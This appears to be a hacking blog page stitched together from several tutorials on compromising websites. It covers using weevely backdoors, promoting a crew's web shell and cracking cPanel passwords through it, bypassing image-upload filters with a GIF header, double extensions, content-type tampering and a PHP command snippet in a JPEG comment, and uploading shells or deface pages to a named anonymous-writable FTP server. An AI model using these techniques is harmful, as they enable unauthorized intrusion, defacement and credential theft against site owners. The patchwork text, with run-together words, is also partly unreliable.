Backconnectusually usedfora proxyserverorfirewallcloseted. so it can notbe doneremotelyconnect.So onetrickis to reverseconnections, whichconnectfrom the servertoyour computer
1- In my case, i already have a vulnerable site and i am able to upload shell. But, after a few seconds accessing the server through the shell, the connection was stopped and it says "Access Denied"
2- So, to bypass this, i will try to access the server again by backconnect using weevely
3- Firstly, open up Command prompt, type in:
cd\ cd \weevely\
4- Now, to execute the weevely.py, type in this command:
weevely.py
or
C:\python27\python.exe weevely.py
5- Alright, now we are going to generate a stealth shell with password. Type in this command
weevely.py generate pass123
or
C:\python27\python.exe weevely generate pass123
6- You can rename weevely.php to anything as you like, okay, now upload weevely.py into the site
7- If you access the weevely.php through the web browser, it will show a blank page, but it doesn't meant it failed.
Weevely v1.1 Weevely is a stealth PHP web shell that provides a telnet or netcat type console and let you execute command remotely. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones. It is a built-in tool in backtrack 5 and easy to install and use in linux but in this tutorial i will show you how to use this tool on Windows Platform.
How to install? 1- Download python interpreter tool which will make your computer capable of running Python script.I m using python2.7.5 on machine, so i would recommend you to use python2.7.5 too.If you have other version then its fine too. Download python windows installer from following url and install it on your windows machine. Download
2- Download weevely from following url.Extract it and enter in its folder through cmd and try to execute this by writing "weevely.py" on command prompt, you will get an error.So lets fix this error and make this work on windows. Download
3- Now download python setuptools from following url and extract it. Download
4- Now press "WINDOWS Button + R" , it will open windows run box for you.There type cmd and press enter.Windows cmd will open before you.
5- Now use cd command to enter to your setup-tools directory i.e.
cd setuptools-0.9.8
6- Now run this command:
setup.py install
Note:sometimes after python interpreter installation, windows do not integrate your .py files with python interpreter.So in such scenario, you can give path of python interpreter to execute setup.py file and upper command will be modified like this
C:\Python27\python.exe setup.py install
7- It will install python setup-tools for and a directory named "Script" will be created in your python installation directory.For default installation path, this is newly created directory C:\Python27\Scripts.
8- Now enter in "C:\Python27\Scripts" directory and run easy_install.exe to install pip.As i did below.
cd C:\Python27\Scripts
easy_install.exe pip
9- Now inside the same directory, install these two pyreadline and pyyaml libraries with pip
pip install pyreadline pyyaml
10- Now everything is ready, just enter in weevely directory and execute it
K3RAMA7 Shell was recoded from Shell B374K and K2LL3D , so this is the result from the combination of two Famous shell. This shell named K3RAMA7 because it was recoded and rearrange by Keramat Durjana, the new leader of Black CyberSec Crew.
Today i'm going to show you how to crack Cpanel. :D To crack Cpanel, you must have : SHELLed Site Cpanel Cracker Download : Here List of Username and Password Google It :P Or, if you're using our shell, there already a cpanel cracker :P
Okay, let's get it started :)
Procedure 1- Upload cp.php into your shell. 2- Scroll down, click on User and you will get something like this,
You will get all the username of Cpanel 2- Copy the Username and Password from your dictionary and paste in the User and Pass column
3- Click start and wait them cracked. :D 4- You will get the result in the next page.
DONE!
5. You can login at into the Cpanel at www.example.com:2082 :)
This is the first version of Black CyberSec Crew Shell. During the making of this shell, some of the BCC has helped me a lot especially Tiada Nama and Tony Mota. Thanks guys for your help and support ^_^
Wanna try our shell? Feel free to download it from HERE
This is the tutorial on uploading shell by bypassing the upload image script!!
So someone you want to pwn has got a nice little option on there website to upload a image. Instead were going to try to upload some php code so we can eventually own the box.
The following are ways to do this
Firstly Just try to upload the shell if this doesn't work add add GIF89a; to the top of your shell.php example: GIF89a;
Depending on what kind of file validation they are using this may fool the Server Into thinking its a image since when it reads the file it finds the GIF header and assumes its safe since its a Image.
The next way is to rename your shell to shell.php.jpg and trying to upload. This works because the is a null byte and the server should drop it and anything after it but when you upload, it reads it as a .jpg and not a .php.
Another way you can fool the web server into thinking your uploading a image instead of a php shell is to get Firefox and install the tamperdata Add on then click start tamper and upload your php shell then tamper the data and change the content-Type from 'application/octet-stream' to 'image/jpeg'. ^ self explanatory.
The Final way im going to discuss is somewhat good.
Find yourself a copy of edjpgcom.exe "edjpgcom is a free Windows application that allows you to change (or add) a JPEG comment in a JPEG file." Usage: -- edjpgcom "filename.jpg" Now add this to the jpg comment since you wont be able to drop a whole shell in there due to limits etc. "; system($_GET['cmd']); echo "
"; ?> now rename your jpg to .php and upload. This works since the jpeg and all its attributes are still intact and it seems like a normal jpg to the server.
File Transfer Protocol (FTP) is a standard network protocol used to copy a file from one host to another over a TCP-based network, such as the Internet. FTP is built on a client-server architecture and utilizes separate control and data connections between the client and server. FTP users may authenticate themselves using a clear-text sign-in protocol but can connect anonymously if the server is configured to allow it.
so,If the ftp server does not allow anonymous login,then we have to bruteforce the ftp server using this tool BRUTUS
Tool for ftp bruteforcer:
Code:
http://downloads.z i d d u .com/downloadfile/12201510/brutus-aet2.zip.html
I ill explain about bruteforcer later.
So,If ftp allows the user anonymously with writable directories permitted,then we can easily upload shell or anything to the server.
I got a site here with the specified dork above ,which allows "anonymous" access with writable directory.
Code:
ftp.3gpp.org
First,get the total command tool from here.The total cmd is a user freindly software from which you can transfer the files with ease.
Just place the wincmd.key in the directory(no need to click it to activate) where total cmd installed.
Now open the total commander.It looks like this.
Then press ctrl+N.
Then specify the host name.If the host name is http://www.3gpp.org,then put the host name as "ftp.3gpp.org"
Check the anonymous connection(Default its Checked ,if not tick it) and click ok.Then you see a connect box which makes some connection through ftp.
Now you will see two sides like this.The left side is ("ftp.3gpp.org") files of server and right side is all your pc files.sometimes these sides may be interchanged.
Now right click and hold on any one of the server files.
And go to properties. you will see like this.
I will say what it is.The first dr-xr-xr-x is about the permissions for that particular directory.
dr-xr-xr-x :
1 2 3 4 5 6 7 8 9 10 File User Permissions Group Permissions Other Permissions Type Read Write Execute Read Write Execute Read Write Execute d r w x r w x r w x
12345678910 drwxrwxrwx
1234 is the file user permissions
1-type -d 2-read-r 3-write-w 4-execute-x
567 is the group permission 5-read-r 6-write-w 7-execute-x
89 10 is the other permissions 8-read-r 9-write-w 10-execute-x
Permissions in detail:http://www.comptechdoc.org/os/linux/usersguide/linux_ugfilesp.html
dr-xr-xr-x 1 owner group 0 Jan 17 15:41 Inbox:
so,directory inbox can be read and executed.we cannot write there.
Lets move into inbox.Double click inbox.
And right click and hold in any of the server files and goto properties.There you can notice that
drwxrwxrwx 1 owner group 0 Feb 8 19:44 RAN_WG4
Now RAN_WG4 directory can be read and write.so,make a deface page or shell!!
Go into ran_wg4 by double clicking it.goto drafts
Now in the right side you can see ur pc files.Now just navigate to the deface page or shell in ur pc files and drag and drop the deface page or shell to the server files.
Then you will be prompted a msg to confirm your update.Just click ok.Now your file is transfered.
goto http://ftp.3gpp.prg in your browser and navigate to inbox->ran_wg4->drafts->gtr.htl(which is newly copied)
If the ftp server did not allow access to anonymous login,Then we have to brutefore it using a bruteforcer tool.Normally the ftp server is secured,If u got luck then u can get the logins with the brutus tool..
Code:
http://downloads.z i d d u .com/downloadfile/12201510/brutus-aet2.zip.html
The tool will be detected as hack tool by all antivirus!!Its not a virus.Its clean.If u want ,run it in virtual machine!!
![[Image: totalcmd.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uLQri30uwlKfbJ7b6M3SlRrjzCuEfhHnMkfXcY3bupp5Zx04XwtHL2FxT28fV_qv-uh91kOK-em_3MRvcLh5mKmH6JZAOb25uoXt-87ZUj-ns0iKzsvnE=s0-d)
![[Image: total2c.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tVum387Euggl_PXJu_dr0vAyKVHqZUiFXSEX5IEgAVwWhJ5tEtzxlm_p_uMK2WETlYj20rDZeGGhbsGYEcCSKFZ7cnbFp_wwaRkCqv7vt54vrYs5cdQQ=s0-d)
![[Image: total3d.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vwghGaCgr21wRvfmjq8tquU7sffuItaEPOPKIdxJUjJ2ORkRNbQdJQ4eISQcUvSd7Qqilkc9tgjdoQbSHu3Ffvl5Yrk9VwQfxT1_0cA4Ax5uU9dw=s0-d)
![[Image: total4.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tFw_CrRaPCGa6IZ-ZmoLTWQA-PMdNh1F76j64K1x8USE6ZVWNLCJQO8l6AXWFyY6bbae62KsLfHldKHX7CiMZTCVinoB1VeX_2MsVC3NT-f74Uom_D=s0-d)
![[Image: total5.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vAXq-fmGUaZ0X2JyJPN245mgZgztIwZfCwxA49Jhx5bmycBgVZzu1ix0dROPyEGN9o3kyFMSuMaxYbcy2DHV_M5HtfThavouOKfkc7HJAtGk0lSi8=s0-d)
![[Image: total6.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uRepWpkGh3T3mP5ZESXxTrxr12g6fcvjI7S0bW2b3szBLwBmJraesWYzM5kszQu3qUQDwE8aSGE_VXLv2OEfGLr4uqXt1FBjjTT8zz1LBX3-aVo1o=s0-d)
![[Image: total7.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t9rZLgzYpXB_b0pGObwD_3LUmgrukXrZ-MglcbmKvBKbhYnjXsOJfIEKAj3Vp9j7Gv-zyRbP-bZtgmYr71rrFApzEL4Unp2ZFIEiy4QLhkS9ruow=s0-d)
![[Image: total8.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tVjYzVGB4RiuqtMLbRF2ODpZpiPFhksZO5HJnln67UQFh0nT0xb2XSXoiYlHhY2cZxDHQtSxc7Cu35awt7gDBnRtgUfenHb10MPmTNIHKssi-LppL5=s0-d)
![[Image: total9.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_slKkOhViZUXjyDE6Csin1CoQ6V4SFKP9a8uzY3Kr6PZDbT-Z6-ZtaDycdXQq11ekgGu8_FgEAVxPX5eJDRAoliyoKLkGu1aR7sm2U1yYG8RcdE=s0-d)
![[Image: total10.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s9HoyxSNo7B7fDeOzps2IgkZcISNgK47UrroIyaR2fsD9blkEkpMK4sxrnGOQgLKjxJ9tm3poV0-S6OgdCU9Zlc5qmfKteSDiRTUJ7_KxKT0ywCxAk=s0-d)
![[Image: total11copy.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vGP9XnQa5_rgXnUQGMw0AfO6KhvllaWuPtQdz-yHA68F9MVit03am5zMUG4oHZSByJxEAoMtIfAEmVp8oMEPehU6JGpevP_ruLzqz4lrsEuNZ1iIo_VY4deIE=s0-d)
Articles
